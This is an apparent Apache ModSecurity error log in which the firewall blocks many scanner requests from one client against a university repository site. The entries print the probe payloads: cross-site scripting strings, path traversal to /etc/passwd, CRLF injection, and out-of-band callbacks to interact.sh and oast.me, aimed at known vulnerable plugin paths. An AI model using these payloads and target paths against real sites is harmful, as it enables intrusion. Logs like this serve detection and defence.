[Tue Aug 29 11:52:55.927873 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAmQ-38AAAAb"]
[Tue Aug 29 11:52:55.932530 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoPuacAAAAM"]
[Tue Aug 29 11:52:58.593473 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAoZ6Q0AAAAK"]
[Tue Aug 29 11:52:59.204173 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAohZ44AAAAZ"]
[Tue Aug 29 11:53:00.667025 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAlUlzYAAAA0"]
[Tue Aug 29 11:53:00.719987 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAojanYAAAAb"]
[Tue Aug 29 11:53:01.564503 2023] [:error] [pid 2589] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAodkpUAAAAS"]
[Tue Aug 29 11:53:02.819361 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAoXJtkAAAAP"]
[Tue Aug 29 11:53:02.836894 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAnTlZMAAAAA"]
[Tue Aug 29 11:53:04.009073 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAolKTAAAAAe"]
[Tue Aug 29 11:53:04.015847 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15sMCo-f0AAAfWOUEAAAAL"]
[Tue Aug 29 11:53:04.761437 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAosCu4AAAAm"]
[Tue Aug 29 11:53:04.908263 2023] [:error] [pid 2589] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAodkpoAAAAS"]
[Tue Aug 29 11:53:06.678045 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAouCyYAAAAo"]
[Tue Aug 29 11:53:08.265262 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAosCvMAAAAm"]
[Tue Aug 29 11:53:08.369379 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoAkwcAAAAC"]
[Tue Aug 29 11:53:08.601615 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAouCykAAAAo"]
[Tue Aug 29 11:53:08.808477 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoW7NIAAAAJ"]
[Tue Aug 29 11:53:09.664494 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tcCo-f0AAAoXJucAAAAP"]
[Tue Aug 29 11:53:10.820350 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAot8McAAAAn"]
[Tue Aug 29 11:53:11.964986 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15t8Co-f0AAAosCvkAAAAm"]
[Tue Aug 29 11:53:12.100106 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAouCzAAAAAo"]
[Tue Aug 29 11:53:12.576090 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15uMCo-f0AAAfWOVAAAAAL"]
[Tue Aug 29 11:53:13.719037 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15ucCo-f0AAAni-CQAAAAU"]
[Tue Aug 29 11:53:14.486994 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAojapIAAAAb"]
[Tue Aug 29 11:53:14.646086 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAog@DIAAAAY"]
[Tue Aug 29 11:53:15.852376 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAoLfRQAAAAG"]
[Tue Aug 29 11:53:16.551905 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAog@DsAAAAY"]
